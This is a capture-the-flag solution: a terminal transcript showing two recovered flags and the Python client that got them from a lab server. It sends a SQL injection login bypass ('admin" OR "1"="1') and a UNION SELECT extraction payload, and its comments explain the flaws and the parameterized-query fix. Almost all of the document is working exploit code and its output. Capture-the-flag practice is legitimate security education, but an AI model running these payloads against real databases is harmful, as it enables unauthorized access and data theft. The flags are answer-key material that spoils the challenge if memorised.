root@kali:~/Downloads# python client.py
[+] Test level1 ...
Welcome on level 1 !
Welcome b'admin" OR "1"="1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}'
[+] Test level2 ...
Welcome on level 2 !
Citation #123 union SELECT * fROM flag:
ESE{7d2f9e9beab248febaf5bddffc3a39a4}
Code source : client.py
#encoding: utf-8
import socket
import sys
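# Address of the challenge server; change this if needed.
HOST = '192.168.1.19'
# TCP port of the challenge server; change this if needed. Despite its name,
# create_socket() passes this value to connect() as the port, not an address.
IP = 8096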
def create_socket():
    """Open a TCP connection to (HOST, IP) and return the connected socket.

    A 1-second timeout is set before connecting, so the connect and every
    later blocking call on the socket raise a timeout error instead of
    hanging. Any exception while creating or connecting the socket is
    reported on stdout and ends the process with exit status 1.
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(1)
        # IP holds the TCP port number despite its name.
        endpoint = (HOST, IP)
        sock.connect(endpoint)
    except Exception as err:
        print("Can't open socket !")
        print(err)
        sys.exit(1)
    else:
        return sock
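def test_level1():
    """Replay the level 1 login request and print the server's two replies.

    Wire format, as built below: byte 0x01 selects the level, then the login
    and the password separated by a NUL byte. Both fields contain double
    quotes and SQL keywords rather than plain credentials; the transcript on
    this page shows the server answering with a welcome line and the flag,
    so it treated them as query text. Presumably the server splices the
    fields into its SQL string (not visible here); binding them as query
    parameters would keep them inert data.

    The socket is closed on every path, including a recv() timeout, which
    still propagates to the caller.
    """
    print("[+] Test level1 ...")
    s = create_socket()
    try:
        login = 'admin" OR "1"="1'
        password = 'toto" OR "1"="1" LIMIT "1" OFFSET "2'
        cmd = "\x01%s\x00%s" % (login, password)
        # sendall() keeps writing until the whole request is out; a plain
        # send() may return after a partial write.
        s.sendall(cmd.encode('utf-8'))

        # An empty read (peer closed) decodes to '' and fails the check below.
        banner = s.recv(1024).decode('utf-8')
        if banner.startswith("Welcome"):
            print(banner)
            res = s.recv(1024)
            print(res.decode('utf-8'))
        else:
            print("If you called a valid level, notice an admin")
    finally:
        s.close()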
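def test_level2():
    """Replay the level 2 citation request and print the server's two replies.

    Wire format, as built below: byte 0x02 selects the level, followed by the
    citation identifier. The value sent is not a bare number but a number
    followed by a UNION SELECT clause; the transcript on this page shows the
    reply carrying the flag, so the server presumably concatenates the
    identifier into its query (not visible here). Validating the field as an
    integer, or binding it as a query parameter, would neutralise it.

    The socket is closed on every path, including a recv() timeout, which
    still propagates to the caller.
    """
    print("[+] Test level2 ...")
    s = create_socket()
    try:
        citation = '123 union SELECT * fROM flag'
        # Format as text, then encode, as test_level1 does: on Python 3,
        # bytes %-formatting with a str operand raises TypeError.
        request = ("\x02%s" % citation).encode('utf-8')
        # sendall() keeps writing until the whole request is out; a plain
        # send() may return after a partial write.
        s.sendall(request)

        # An empty read (peer closed) decodes to '' and fails the check below.
        banner = s.recv(1024).decode('utf-8')
        if banner.startswith("Welcome"):
            print(banner)
            res = s.recv(1024)
            print(res.decode('utf-8'))
        else:
            print("If you called a valid level, notice an admin")
    finally:
        s.close()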
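# Script entry point: run the level 1 check, print a blank separator line,
# then run the level 2 check. Nothing runs when the file is imported.
if __name__ == '__main__':
    test_level1()
    print("")
    test_level2()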